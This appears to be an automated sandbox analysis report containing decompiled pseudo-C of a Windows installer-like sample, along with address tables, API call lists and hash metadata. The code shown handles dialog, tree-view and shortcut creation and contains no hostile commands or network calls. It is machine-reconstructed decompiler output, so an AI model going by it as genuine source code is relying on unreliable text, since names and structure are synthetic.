										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x4018 + _t285 + 8) =  *(_t233 * 0x4018 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x4018 + _t285 + 8) =  *(_t233 * 0x4018 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404D1A(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x4018 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x47025c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x44670c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x446720;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x44670c = _t282;
								 *0x446720 = _t282;
								 *0x4702c0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x47025d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404D9A();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x446720;
									_t195 =  *0x470288;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x47028c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x46821c + 0x10)) != _t282) {
											E00404CD5(0x3ff, 0xfffffffb, E00404CED(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x1006]);
									} while (_v20 <  *0x47028c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x446720);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x4702c0 = _t306;
					 *0x446720 = GlobalAlloc(0x40,  *0x47028c << 2);
					_t252 = LoadBitmapW( *0x470240, 0x6e);
					 *0x446714 =  *0x446714 | 0xffffffff;
					_t313 = _t252;
					 *0x44671c = SetWindowLongW(_v8, 0xfffffffc, E004053C4);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x44670c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x44670c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E0040640A(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E0040435F(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E0040435F(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x47028c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x446720 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x446720 + _t316 * 4) = _t276;
									_t284 =  *( *0x446720 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x4018]);
							_v28 = _t302;
						} while (_t316 <  *0x47028c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404394(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404394(_v12);
								L91:
								return E004043C6(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}




























































                                                                                                                                                                                                  0x00404ddb
                                                                                                                                                                                                  0x00404dec
                                                                                                                                                                                                  0x00404df1
                                                                                                                                                                                                  0x00404df9
                                                                                                                                                                                                  0x00404dff
                                                                                                                                                                                                  0x00404e07
                                                                                                                                                                                                  0x00404e15
                                                                                                                                                                                                  0x00404e18
                                                                                                                                                                                                  0x00405039
                                                                                                                                                                                                  0x00405040
                                                                                                                                                                                                  0x00405054
                                                                                                                                                                                                  0x00405042
                                                                                                                                                                                                  0x00405044
                                                                                                                                                                                                  0x00405047
                                                                                                                                                                                                  0x00405048
                                                                                                                                                                                                  0x0040504f
                                                                                                                                                                                                  0x0040504f
                                                                                                                                                                                                  0x00405060
                                                                                                                                                                                                  0x0040506e
                                                                                                                                                                                                  0x00405071
                                                                                                                                                                                                  0x00405087
                                                                                                                                                                                                  0x004050fc
                                                                                                                                                                                                  0x004050ff
                                                                                                                                                                                                  0x00405101
                                                                                                                                                                                                  0x0040510b
                                                                                                                                                                                                  0x00405119
                                                                                                                                                                                                  0x00405119
                                                                                                                                                                                                  0x0040511b
                                                                                                                                                                                                  0x00405125
                                                                                                                                                                                                  0x0040512b
                                                                                                                                                                                                  0x0040512e
                                                                                                                                                                                                  0x00405131
                                                                                                                                                                                                  0x0040514c
                                                                                                                                                                                                  0x00405133
                                                                                                                                                                                                  0x0040513d
                                                                                                                                                                                                  0x0040513d
                                                                                                                                                                                                  0x00405131
                                                                                                                                                                                                  0x00405125
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004050ff
                                                                                                                                                                                                  0x0040508c
                                                                                                                                                                                                  0x00405097
                                                                                                                                                                                                  0x0040509c
                                                                                                                                                                                                  0x004050a3
                                                                                                                                                                                                  0x004050a8
                                                                                                                                                                                                  0x004050ac
                                                                                                                                                                                                  0x004050b7
                                                                                                                                                                                                  0x004050b7
                                                                                                                                                                                                  0x004050bb
                                                                                                                                                                                                  0x004050bf
                                                                                                                                                                                                  0x004050c3
                                                                                                                                                                                                  0x004050d6
                                                                                                                                                                                                  0x004050c5
                                                                                                                                                                                                  0x004050c5
                                                                                                                                                                                                  0x004050cc
                                                                                                                                                                                                  0x004050d2
                                                                                                                                                                                                  0x004050ce
                                                                                                                                                                                                  0x004050ce
                                                                                                                                                                                                  0x004050ce
                                                                                                                                                                                                  0x004050cc
                                                                                                                                                                                                  0x004050da
                                                                                                                                                                                                  0x004050dc
                                                                                                                                                                                                  0x004050ef
                                                                                                                                                                                                  0x004050f2
                                                                                                                                                                                                  0x004050f5
                                                                                                                                                                                                  0x004050f5
                                                                                                                                                                                                  0x004050bf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004050ac
                                                                                                                                                                                                  0x0040508e
                                                                                                                                                                                                  0x00405095
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040514f
                                                                                                                                                                                                  0x0040514f
                                                                                                                                                                                                  0x00405156
                                                                                                                                                                                                  0x004051c7
                                                                                                                                                                                                  0x004051cf
                                                                                                                                                                                                  0x004051d7
                                                                                                                                                                                                  0x004051d7
                                                                                                                                                                                                  0x004051e0
                                                                                                                                                                                                  0x004051e2
                                                                                                                                                                                                  0x004051e9
                                                                                                                                                                                                  0x004051ec
                                                                                                                                                                                                  0x004051ec
                                                                                                                                                                                                  0x004051f2
                                                                                                                                                                                                  0x004051f9
                                                                                                                                                                                                  0x004051fc
                                                                                                                                                                                                  0x004051fc
                                                                                                                                                                                                  0x00405202
                                                                                                                                                                                                  0x00405208
                                                                                                                                                                                                  0x0040520e
                                                                                                                                                                                                  0x0040520e
                                                                                                                                                                                                  0x0040521b
                                                                                                                                                                                                  0x00405371
                                                                                                                                                                                                  0x00405378
                                                                                                                                                                                                  0x00405395
                                                                                                                                                                                                  0x0040539b
                                                                                                                                                                                                  0x004053ad
                                                                                                                                                                                                  0x004053ad
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405221
                                                                                                                                                                                                  0x00405223
                                                                                                                                                                                                  0x00405228
                                                                                                                                                                                                  0x0040522d
                                                                                                                                                                                                  0x00405232
                                                                                                                                                                                                  0x00405234
                                                                                                                                                                                                  0x00405234
                                                                                                                                                                                                  0x00405235
                                                                                                                                                                                                  0x00405236
                                                                                                                                                                                                  0x00405238
                                                                                                                                                                                                  0x00405238
                                                                                                                                                                                                  0x00405240
                                                                                                                                                                                                  0x00405281
                                                                                                                                                                                                  0x00405283
                                                                                                                                                                                                  0x00405293
                                                                                                                                                                                                  0x00405296
                                                                                                                                                                                                  0x0040529b
                                                                                                                                                                                                  0x004052a2
                                                                                                                                                                                                  0x004052a5
                                                                                                                                                                                                  0x00405347
                                                                                                                                                                                                  0x0040534d
                                                                                                                                                                                                  0x0040535b
                                                                                                                                                                                                  0x0040536c
                                                                                                                                                                                                  0x0040536c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040535b
                                                                                                                                                                                                  0x004052ab
                                                                                                                                                                                                  0x004052ae
                                                                                                                                                                                                  0x004052b4
                                                                                                                                                                                                  0x004052b9
                                                                                                                                                                                                  0x004052bb
                                                                                                                                                                                                  0x004052bd
                                                                                                                                                                                                  0x004052c3
                                                                                                                                                                                                  0x004052ca
                                                                                                                                                                                                  0x004052cf
                                                                                                                                                                                                  0x004052d6
                                                                                                                                                                                                  0x004052d9
                                                                                                                                                                                                  0x004052d9
                                                                                                                                                                                                  0x004052e0
                                                                                                                                                                                                  0x004052ec
                                                                                                                                                                                                  0x004052f0
                                                                                                                                                                                                  0x004052f2
                                                                                                                                                                                                  0x004052f2
                                                                                                                                                                                                  0x004052e2
                                                                                                                                                                                                  0x004052e4
                                                                                                                                                                                                  0x004052e4
                                                                                                                                                                                                  0x00405312
                                                                                                                                                                                                  0x0040531e
                                                                                                                                                                                                  0x0040532d
                                                                                                                                                                                                  0x0040532d
                                                                                                                                                                                                  0x0040532f
                                                                                                                                                                                                  0x00405332
                                                                                                                                                                                                  0x0040533b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405242
                                                                                                                                                                                                  0x0040524d
                                                                                                                                                                                                  0x00405250
                                                                                                                                                                                                  0x00405255
                                                                                                                                                                                                  0x00405257
                                                                                                                                                                                                  0x0040525b
                                                                                                                                                                                                  0x0040526b
                                                                                                                                                                                                  0x00405275
                                                                                                                                                                                                  0x00405277
                                                                                                                                                                                                  0x0040527a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040525d
                                                                                                                                                                                                  0x0040525d
                                                                                                                                                                                                  0x00405263
                                                                                                                                                                                                  0x00405265
                                                                                                                                                                                                  0x00405265
                                                                                                                                                                                                  0x00405266
                                                                                                                                                                                                  0x00405267
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040525d
                                                                                                                                                                                                  0x00405240
                                                                                                                                                                                                  0x0040521b
                                                                                                                                                                                                  0x0040515e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405174
                                                                                                                                                                                                  0x0040517e
                                                                                                                                                                                                  0x00405183
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405195
                                                                                                                                                                                                  0x0040519a
                                                                                                                                                                                                  0x004051a6
                                                                                                                                                                                                  0x004051a6
                                                                                                                                                                                                  0x004051a8
                                                                                                                                                                                                  0x004051b7
                                                                                                                                                                                                  0x004051b9
                                                                                                                                                                                                  0x004051bd
                                                                                                                                                                                                  0x004051c0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004051c0
                                                                                                                                                                                                  0x0040515e
                                                                                                                                                                                                  0x00404e1e
                                                                                                                                                                                                  0x00404e23
                                                                                                                                                                                                  0x00404e2c
                                                                                                                                                                                                  0x00404e33
                                                                                                                                                                                                  0x00404e41
                                                                                                                                                                                                  0x00404e4c
                                                                                                                                                                                                  0x00404e52
                                                                                                                                                                                                  0x00404e60
                                                                                                                                                                                                  0x00404e74
                                                                                                                                                                                                  0x00404e79
                                                                                                                                                                                                  0x00404e86
                                                                                                                                                                                                  0x00404e8b
                                                                                                                                                                                                  0x00404ea1
                                                                                                                                                                                                  0x00404eb2
                                                                                                                                                                                                  0x00404ebf
                                                                                                                                                                                                  0x00404ebf
                                                                                                                                                                                                  0x00404ec2
                                                                                                                                                                                                  0x00404ec8
                                                                                                                                                                                                  0x00404eca
                                                                                                                                                                                                  0x00404ecd
                                                                                                                                                                                                  0x00404ed2
                                                                                                                                                                                                  0x00404ed7
                                                                                                                                                                                                  0x00404ed9
                                                                                                                                                                                                  0x00404ed9
                                                                                                                                                                                                  0x00404ef9
                                                                                                                                                                                                  0x00404ef9
                                                                                                                                                                                                  0x00404efb
                                                                                                                                                                                                  0x00404efc
                                                                                                                                                                                                  0x00404f01
                                                                                                                                                                                                  0x00404f04
                                                                                                                                                                                                  0x00404f07
                                                                                                                                                                                                  0x00404f0b
                                                                                                                                                                                                  0x00404f10
                                                                                                                                                                                                  0x00404f15
                                                                                                                                                                                                  0x00404f19
                                                                                                                                                                                                  0x00404f1e
                                                                                                                                                                                                  0x00404f23
                                                                                                                                                                                                  0x00404f25
                                                                                                                                                                                                  0x00404f2d
                                                                                                                                                                                                  0x00404ff8
                                                                                                                                                                                                  0x0040500b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404f33
                                                                                                                                                                                                  0x00404f36
                                                                                                                                                                                                  0x00404f39
                                                                                                                                                                                                  0x00404f3c
                                                                                                                                                                                                  0x00404f3c
                                                                                                                                                                                                  0x00404f43
                                                                                                                                                                                                  0x00404f49
                                                                                                                                                                                                  0x00404f4c
                                                                                                                                                                                                  0x00404f52
                                                                                                                                                                                                  0x00404f53
                                                                                                                                                                                                  0x00404f58
                                                                                                                                                                                                  0x00404f61
                                                                                                                                                                                                  0x00404f68
                                                                                                                                                                                                  0x00404f6b
                                                                                                                                                                                                  0x00404f6e
                                                                                                                                                                                                  0x00404f71
                                                                                                                                                                                                  0x00404fad
                                                                                                                                                                                                  0x00404fd6
                                                                                                                                                                                                  0x00404faf
                                                                                                                                                                                                  0x00404fbc
                                                                                                                                                                                                  0x00404fbc
                                                                                                                                                                                                  0x00404f73
                                                                                                                                                                                                  0x00404f76
                                                                                                                                                                                                  0x00404f85
                                                                                                                                                                                                  0x00404f8f
                                                                                                                                                                                                  0x00404f97
                                                                                                                                                                                                  0x00404f9e
                                                                                                                                                                                                  0x00404fa6
                                                                                                                                                                                                  0x00404fa6
                                                                                                                                                                                                  0x00404f71
                                                                                                                                                                                                  0x00404fdc
                                                                                                                                                                                                  0x00404fdd
                                                                                                                                                                                                  0x00404fe9
                                                                                                                                                                                                  0x00404fe9
                                                                                                                                                                                                  0x00404ff6
                                                                                                                                                                                                  0x00405011
                                                                                                                                                                                                  0x00405015
                                                                                                                                                                                                  0x00405032
                                                                                                                                                                                                  0x00405037
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405017
                                                                                                                                                                                                  0x0040501c
                                                                                                                                                                                                  0x00405025
                                                                                                                                                                                                  0x004053af
                                                                                                                                                                                                  0x004053c1
                                                                                                                                                                                                  0x004053c1
                                                                                                                                                                                                  0x00405015
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404ff6
                                                                                                                                                                                                  0x00404f2d

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404DE4
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404DEF
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                                                                                                  • SetWindowLongW.USER32 ref: 00404E65
                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                                                                                                  • SetWindowLongW.USER32 ref: 0040500B
                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                                                                                                  • GlobalFree.KERNEL32 ref: 004051FC
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 004053A6
                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                  • String ID: $M$N
                                                                                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                                                                                  • Opcode ID: 2e47159a8ee18e206dd23a4901cc844ba6fc231fc2eeb5e404362fef1fcfc38e
                                                                                                                                                                                                  • Instruction ID: d2f35d8900002cfc25ccfd4abe259465259501dfb46309a939b5c4dc2546952f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e47159a8ee18e206dd23a4901cc844ba6fc231fc2eeb5e404362fef1fcfc38e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45028CB0900609EFEB109F94CD85AAE7BB5FB44314F10817AF615BA2E1C7798E42DF58
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00402104 Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                                  			E00402104() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C41(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C41(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C41(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C41(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C41(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405D34( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C41(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x4c9000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                                                                                                                                  0x0040210d
                                                                                                                                                                                                  0x00402117
                                                                                                                                                                                                  0x00402121
                                                                                                                                                                                                  0x0040212b
                                                                                                                                                                                                  0x00402136
                                                                                                                                                                                                  0x00402139
                                                                                                                                                                                                  0x00402153
                                                                                                                                                                                                  0x00402156
                                                                                                                                                                                                  0x0040215c
                                                                                                                                                                                                  0x0040215f
                                                                                                                                                                                                  0x00402169
                                                                                                                                                                                                  0x0040216d
                                                                                                                                                                                                  0x0040216d
                                                                                                                                                                                                  0x00402172
                                                                                                                                                                                                  0x00402183
                                                                                                                                                                                                  0x0040218b
                                                                                                                                                                                                  0x00402242
                                                                                                                                                                                                  0x00402242
                                                                                                                                                                                                  0x00402249
                                                                                                                                                                                                  0x00402191
                                                                                                                                                                                                  0x00402191
                                                                                                                                                                                                  0x004021a0
                                                                                                                                                                                                  0x004021a4
                                                                                                                                                                                                  0x004021a7
                                                                                                                                                                                                  0x004021ad
                                                                                                                                                                                                  0x004021bb
                                                                                                                                                                                                  0x004021be
                                                                                                                                                                                                  0x004021c0
                                                                                                                                                                                                  0x004021cb
                                                                                                                                                                                                  0x004021cb
                                                                                                                                                                                                  0x004021d0
